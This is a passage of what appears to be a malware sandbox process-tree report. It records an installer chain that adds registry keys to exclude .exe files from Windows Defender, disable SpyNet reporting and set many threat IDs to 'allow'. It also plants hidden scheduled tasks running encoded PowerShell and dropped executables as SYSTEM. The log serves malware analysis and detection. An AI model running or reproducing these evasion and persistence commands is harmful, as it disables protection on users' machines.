                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                  8⤵
                                                                                    PID:2480
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                6⤵
                                                                                  PID:5692
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                    7⤵
                                                                                      PID:5632
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                        8⤵
                                                                                          PID:4392
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                          8⤵
                                                                                            PID:3044
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "gGvhKmIWC" /SC once /ST 00:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                        6⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:5176
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          7⤵
                                                                                            PID:5004
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "gGvhKmIWC"
                                                                                          6⤵
                                                                                            PID:5752
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "gGvhKmIWC"
                                                                                            6⤵
                                                                                              PID:5352
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\TYtOlOG.exe\" Gv /ntsite_idfxK 385118 /S" /V1 /F
                                                                                              6⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2028
                                                                                      • C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe
                                                                                        "C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3504
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS896F.tmp\Install.exe
                                                                                          .\Install.exe
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6100
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS9258.tmp\Install.exe
                                                                                            .\Install.exe /DDfBFdidvhHni "385118" /S
                                                                                            5⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Enumerates system info in registry
                                                                                            PID:1304
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                              6⤵
                                                                                                PID:828
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                  7⤵
                                                                                                    PID:3184
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                      8⤵
                                                                                                        PID:4120
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                        8⤵
                                                                                                          PID:1124
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                      6⤵
                                                                                                        PID:2760
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                          7⤵
                                                                                                            PID:6056
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                              8⤵
                                                                                                                PID:3664
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                8⤵
                                                                                                                  PID:5136
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "gEdoOJdNL" /SC once /ST 00:31:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                              6⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:5380
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "gEdoOJdNL"
                                                                                                              6⤵
                                                                                                                PID:4452
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "gEdoOJdNL"
                                                                                                                6⤵
                                                                                                                  PID:5872
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe\" Gv /DUsite_idJlz 385118 /S" /V1 /F
                                                                                                                  6⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:5732
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    7⤵
                                                                                                                      PID:3196
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3376 -ip 3376
                                                                                                          1⤵
                                                                                                            PID:1640
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5076 -ip 5076
                                                                                                            1⤵
                                                                                                              PID:4840
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5216 -ip 5216
                                                                                                              1⤵
                                                                                                                PID:5832
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6032 -ip 6032
                                                                                                                1⤵
                                                                                                                  PID:6100
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6016 -ip 6016
                                                                                                                  1⤵
                                                                                                                    PID:6112
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5004 -ip 5004
                                                                                                                    1⤵
                                                                                                                      PID:2312
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2084 -ip 2084
                                                                                                                      1⤵
                                                                                                                        PID:5228
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                        1⤵
                                                                                                                          PID:5840
                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                            2⤵
                                                                                                                              PID:5252
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                            1⤵
                                                                                                                              PID:4640
                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                2⤵
                                                                                                                                  PID:2484
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5220 -ip 5220
                                                                                                                                1⤵
                                                                                                                                  PID:3232
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4724 -ip 4724
                                                                                                                                  1⤵
                                                                                                                                    PID:5908
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2368 -ip 2368
                                                                                                                                    1⤵
                                                                                                                                      PID:2760
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4452 -ip 4452
                                                                                                                                      1⤵
                                                                                                                                        PID:5144
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3564 -ip 3564
                                                                                                                                        1⤵
                                                                                                                                          PID:5740
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3708 -ip 3708
                                                                                                                                          1⤵
                                                                                                                                            PID:5608
                                                                                                                                          • C:\Windows\windefender.exe
                                                                                                                                            C:\Windows\windefender.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:6140
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                              1⤵
                                                                                                                                                PID:1008
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:5656
                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1268
                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5048
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5148 -ip 5148
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5012
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe Gv /DUsite_idJlz 385118 /S
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5324
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3964
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6080
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5672
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5392
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5368
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1076
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5316
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2300
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2368
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5848
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5832
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4316
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5312
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3700
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3908
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3392
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1120
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1144
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:840
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:412
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:928
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5616
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3436
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4748
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3324
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5124
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2128
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5132
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
